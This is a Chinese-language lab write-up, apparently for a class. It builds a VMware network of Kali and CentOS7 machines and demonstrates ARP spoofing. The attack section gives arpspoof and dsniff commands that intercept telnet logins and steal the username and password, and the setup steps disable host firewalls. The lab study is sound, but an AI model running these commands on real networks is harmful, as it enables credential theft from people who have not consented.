目錄
- 環境
- 軟體
- 網絡拓撲圖
- 配置流程
- 配置構思
- 具體流程
- 建構CentOS7_1
- 設定CentOS7_1網絡
- 設定kali網絡
- 設定CentOS7_2網絡
- 設定CentOS7_3網絡
- 問題
- 問題1:Kali網絡配置完成後僅僅能ping通自己
- 問題2:同一個網段但是主機不可達
- 示範過程
- 狀态
- 檢查Attack前centOS7_1的ARP位址表
- 在kali上輸入以下指令發動攻擊
- 此時檢視centOS7_1的ARP位址表
- 在centOS7_1上telnet登入centOS7_3
- 在kali上檢視竊取的賬号密碼
- 參考
環境
軟體
- VMware15
- ISO:Kali、centOS7
網絡拓撲圖

配置流程
配置構思
Kali中已經有相應的工具了,我們隻需要将網絡配置好就OK,關鍵就是一個網絡配置。以下我按照拓撲圖進行建構。
具體流程
建構CentOS7_1
虛拟機的安裝不再累贅,僅僅說明一下參數。
- 記憶體:1G
- 硬碟:20G
- 系統初始:mini最小化安裝,就不要裝圖形了(以最小的代價完成這個示範)
通過yum檢視Telnet相關的工具并安裝,telnet分為用戶端和服務端,*通配一下
[root@localhost]# yum -y install telnet*
在磁盤空間上複制兩份作為CentOS7_2、CentOS7_3。
設定CentOS7_1網絡
[root@localhost]# ifconfig ens33 192.168.41.2/24 #定義ipv4
[root@localhost]# route add default gw 192.168.41.1/24 #定義預設網關
[root@localhost]# systemctl stop firewalld.service #關掉防火牆
設定kali網絡
[root@localhost]# ifconfig ens33 192.168.41.3/24 #定義ipv4
[root@localhost]# route add default gw 192.168.41.1/24 #定義預設網關
設定CentOS7_2網絡
這是一個網關連接配接兩個子網192.168.40.0/24和192.168.41.0/24,是以他本身就會有兩個IP位址,在虛拟機配置中添加一個網卡,如圖:
檢視ip獲得網絡擴充卡名稱後,配置ipv4位址
[root@localhost]# ifconfig ens33 192.168.41.1/24 #定義擴充卡ens33 ipv4
[root@localhost]# ifconfig ens37 192.168.40.1/24 #定義擴充卡ens37 ipv4
[root@localhost]# echo 1 > /proc/sys/net/ipv4/ip_forward #自動轉發
[root@localhost]# route add -net 192.168.41.0/24 gw 192.168.41.1 #配置網關
[root@localhost]# route add -net 192.168.40.0/24 gw 192.168.40.1 #配置網關
[root@localhost]# systemctl stop firewalld.service #關掉防火牆
設定CentOS7_3網絡
同CentOS7_1差不多
[root@localhost]# ifconfig ens33 192.168.40.2/24 #定義ipv4
[root@localhost]# route add default gw 192.168.40.1/24 #定義預設網關
[root@localhost]# systemctl stop firewalld.service #關掉防火牆
問題
以上如果配置成功就可以使用CentOS7_1 和Kali ping 通CentOS7_3主機。一定要完成這兩個ping的驗證才行。
問題1:Kali網絡配置完成後僅僅能ping通自己
我在實踐中第一次使用指令行改的網絡配置,隻能ping同自己。這不科學cent1能ping通cent3的。然後我在圖形界面的設定中修改了靜态IP,并關閉虛拟機,檢查虛拟網絡設定,最後我的配置,如圖:(四台除了安裝軟體時是用的nat,其他都是僅主機模式)
問題2:同一個網段但是主機不可達
網絡ip設定沒問題,虛拟網絡連接配接沒問題。那麼這個問題主要是防火牆沒關。
示範過程
狀态
- CentOS7_1能telnet上CentOS7_3
- Kali ping通CentOS7_2
檢查Attack前centOS7_1的ARP位址表
在kali上輸入以下指令發動攻擊
root@kali:~# echo 1 > /pro/sys/net/ipv4/ip_forward #自動轉發真正的網關
root@kali:~# arpspoof -i -eth0 -t 192.168.41.2 192.168.41.1 #指定目标
root@kali:~# dsniff #開始嗅探
此時檢視centOS7_1的ARP位址表
在centOS7_1上telnet登入centOS7_3
在kali上檢視竊取的賬号密碼
參考
提供一些我在示範過程中參看的博文,都特别的詳細。arp都老掉牙了,老師讓我們爽一波。。。。。。當然,不是說這個攻擊不好使。隻不過熱衷于追逐新手法,希望老師來波猛的。
CentOS7檢視和關閉防火牆
VMware模拟搭建路由環境 這個很标準,符合實際的網絡布局,我的稍微簡化了些
CentOS 7.4安裝telnet服務端
中間人攻擊——ARP欺騙的原理、實戰及防禦